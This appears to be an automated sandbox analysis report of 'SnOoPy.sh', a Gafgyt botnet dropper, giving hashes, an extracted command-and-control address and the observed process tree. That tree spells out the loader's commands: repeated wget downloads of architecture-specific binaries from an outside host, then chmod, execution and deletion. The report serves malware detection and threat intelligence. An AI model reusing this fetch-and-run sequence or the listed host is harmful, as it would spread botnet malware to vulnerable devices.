Analysis
max time kernel: 150s
max time network: 153s
platform: debian-9_armhf
resource: debian9-armhf-20240611-en
resource tags: arch:armhf image:debian9-armhf-20240611-en kernel:4.9.0-13-armmp-lpae locale:en-us os:debian-9-armhf system
submitted: 03-12-2024 22:19
Static task: static1
Behavioral task: behavioral1 (Sample: SnOoPy.sh, Resource: ubuntu1804-amd64-20240611-en)
Behavioral task: behavioral2 (Sample: SnOoPy.sh, Resource: debian9-armhf-20240611-en)
Behavioral task: behavioral3 (Sample: SnOoPy.sh, Resource: debian9-mipsbe-20240611-en)
Behavioral task: behavioral4 (Sample: SnOoPy.sh, Resource: debian9-mipsel-20240226-en)
General
Target: SnOoPy.sh
Size: 2KB
MD5: 8ea1e7d08dd0cf52bbdddc3222e9b8af
SHA1: f031a227d961d83fc0083c4b5b7b4ccdfe64e711
SHA256: 2884954c3ee63cc245def342b3946b24b0aa2cbaebf7d6b2c5a8fd009760a469
SHA512: 1be9d8a04c9b95e9e07c6fad4ae90a160219b05d0bf4b77578ac7dee91b5f336688ac792aab88cc78b5923963e1c9bacf8c0407fc22119041e9def0f217800da
Malware Config
Extracted: gafgyt, 192.3.179.33:23
Signatures
Detected Gafgyt variant (1 IoCs)
  resource: behavioral2/files/fstream-1.dat  yara_rule: family_gafgyt
Gafgyt family
File and Directory Permissions Modification (1 TTPs, 13 IoCs)
  Adversaries may modify file or directory permissions to evade defenses.
  pid / Process: 751 chmod, 767 chmod, 717 chmod, 721 chmod, 728 chmod, 707 chmod, 711 chmod, 735 chmod, 743 chmod, 759 chmod, 680 chmod, 692 chmod, 700 chmod
Executes dropped EXE (1 IoCs)
  ioc: /tmp/a-r.m-6.SNOOPY  pid: 712  Process: a-r.m-6.SNOOPY
Reads system routing table (1 TTPs, 1 IoCs)
  Gets active network interfaces from /proc virtual filesystem.
  description: File opened for reading  ioc: /proc/net/route  Process: a-r.m-6.SNOOPY
Reads system network configuration (1 TTPs, 1 IoCs)
  Uses contents of /proc filesystem to enumerate network settings.
  description: File opened for reading  ioc: /proc/net/route  Process: a-r.m-6.SNOOPY
Writes file to tmp directory (1 IoCs)
  Malware often drops required files in the /tmp directory.
  description: File opened for modification  ioc: /tmp/a-r.m-6.SNOOPY  Process: wget
Processes
/tmp/SnOoPy.sh  cmd: /tmp/SnOoPy.sh  PID:663
  /usr/bin/wget  cmd: wget http://192.3.179.33/m-i.p-s.SNOOPY  PID:666
  /bin/chmod  cmd: chmod +x m-i.p-s.SNOOPY  PID:680  [File and Directory Permissions Modification]
  /tmp/m-i.p-s.SNOOPY  cmd: ./m-i.p-s.SNOOPY  PID:682
  /bin/rm  cmd: rm -rf m-i.p-s.SNOOPY  PID:683
  /usr/bin/wget  cmd: wget http://192.3.179.33/m-p.s-l.SNOOPY  PID:685
  /bin/chmod  cmd: chmod +x m-p.s-l.SNOOPY  PID:692  [File and Directory Permissions Modification]
  /tmp/m-p.s-l.SNOOPY  cmd: ./m-p.s-l.SNOOPY  PID:693
  /bin/rm  cmd: rm -rf m-p.s-l.SNOOPY  PID:695
  /usr/bin/wget  cmd: wget http://192.3.179.33/s-h.4-.SNOOPY  PID:696
  /bin/chmod  cmd: chmod +x s-h.4-.SNOOPY  PID:700  [File and Directory Permissions Modification]
  /tmp/s-h.4-.SNOOPY  cmd: ./s-h.4-.SNOOPY  PID:702
  /bin/rm  cmd: rm -rf s-h.4-.SNOOPY  PID:703
  /usr/bin/wget  cmd: wget http://192.3.179.33/x-8.6-.SNOOPY  PID:704
  /bin/chmod  cmd: chmod +x x-8.6-.SNOOPY  PID:707  [File and Directory Permissions Modification]
  /tmp/x-8.6-.SNOOPY  cmd: ./x-8.6-.SNOOPY  PID:708
  /bin/rm  cmd: rm -rf x-8.6-.SNOOPY  PID:709
  /usr/bin/wget  cmd: wget http://192.3.179.33/a-r.m-6.SNOOPY  PID:710  [Writes file to tmp directory]
  /bin/chmod  cmd: chmod +x a-r.m-6.SNOOPY  PID:711  [File and Directory Permissions Modification]
  /tmp/a-r.m-6.SNOOPY  cmd: ./a-r.m-6.SNOOPY  PID:712  [Executes dropped EXE; Reads system routing table; Reads system network configuration]
  /bin/rm  cmd: rm -rf a-r.m-6.SNOOPY  PID:715
  /usr/bin/wget  cmd: wget http://192.3.179.33/x-3.2-.SNOOPY  PID:716
  /bin/chmod  cmd: chmod +x x-3.2-.SNOOPY  PID:717  [File and Directory Permissions Modification]
  /tmp/x-3.2-.SNOOPY  cmd: ./x-3.2-.SNOOPY  PID:718
  /bin/rm  cmd: rm -rf x-3.2-.SNOOPY  PID:719
  /usr/bin/wget  cmd: wget http://192.3.179.33/a-r.m-7.SNOOPY  PID:720
  /bin/chmod  cmd: chmod +x a-r.m-7.SNOOPY  PID:721  [File and Directory Permissions Modification]
  /tmp/a-r.m-7.SNOOPY  cmd: ./a-r.m-7.SNOOPY  PID:722
  /bin/rm  cmd: rm -rf a-r.m-7.SNOOPY  PID:723
  /usr/bin/wget  cmd: wget http://192.3.179.33/p-p.c-.SNOOPY  PID:724
  /bin/chmod  cmd: chmod +x p-p.c-.SNOOPY  PID:728  [File and Directory Permissions Modification]
  /tmp/p-p.c-.SNOOPY  cmd: ./p-p.c-.SNOOPY  PID:729
  /bin/rm  cmd: rm -rf p-p.c-.SNOOPY  PID:730
  /usr/bin/wget  cmd: wget http://192.3.179.33/i-5.8-6.SNOOPY  PID:732
  /bin/chmod  cmd: chmod +x i-5.8-6.SNOOPY  PID:735  [File and Directory Permissions Modification]
  /tmp/i-5.8-6.SNOOPY  cmd: ./i-5.8-6.SNOOPY  PID:737
  /bin/rm  cmd: rm -rf i-5.8-6.SNOOPY  PID:738
  /usr/bin/wget  cmd: wget http://192.3.179.33/m-6.8-k.SNOOPY  PID:740
  /bin/chmod  cmd: chmod +x m-6.8-k.SNOOPY  PID:743  [File and Directory Permissions Modification]
  /tmp/m-6.8-k.SNOOPY  cmd: ./m-6.8-k.SNOOPY  PID:744
  /bin/rm  cmd: rm -rf m-6.8-k.SNOOPY  PID:745
  /usr/bin/wget  cmd: wget http://192.3.179.33/p-p.c-.SNOOPY  PID:747
  /bin/chmod  cmd: chmod +x p-p.c-.SNOOPY  PID:751  [File and Directory Permissions Modification]
  /tmp/p-p.c-.SNOOPY  cmd: ./p-p.c-.SNOOPY  PID:752
  /bin/rm  cmd: rm -rf p-p.c-.SNOOPY  PID:753
  /usr/bin/wget  cmd: wget http://192.3.179.33/a-r.m-4.SNOOPY  PID:754
  /bin/chmod  cmd: chmod +x a-r.m-4.SNOOPY  PID:759  [File and Directory Permissions Modification]
  /tmp/a-r.m-4.SNOOPY  cmd: ./a-r.m-4.SNOOPY  PID:760
  /bin/rm  cmd: rm -rf a-r.m-4.SNOOPY  PID:761
  /usr/bin/wget  cmd: wget http://192.3.179.33/a-r.m-5.SNOOPY  PID:762
  /bin/chmod  cmd: chmod +x a-r.m-5.SNOOPY  PID:767  [File and Directory Permissions Modification]
  /tmp/a-r.m-5.SNOOPY  cmd: ./a-r.m-5.SNOOPY  PID:768
  /bin/rm  cmd: rm -rf a-r.m-5.SNOOPY  PID:769
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 108KB
MD5: d99e614a76b1b6b63030556a22cf2881
SHA1: 1cc0cc981f07d648722bc0b112da2d697858558f
SHA256: 6bcf634cf08615de9c4f5759bcc2523b114db64a67ed3c119c7aa4230be0b0b5
SHA512: 19585dae9db8f913f809da6644127b064b03ec2156fe482b87feb803c8facb291da0b951336c7bc13cef6af1a032229f8f18511b09531a2ad3dce4f53bb8051f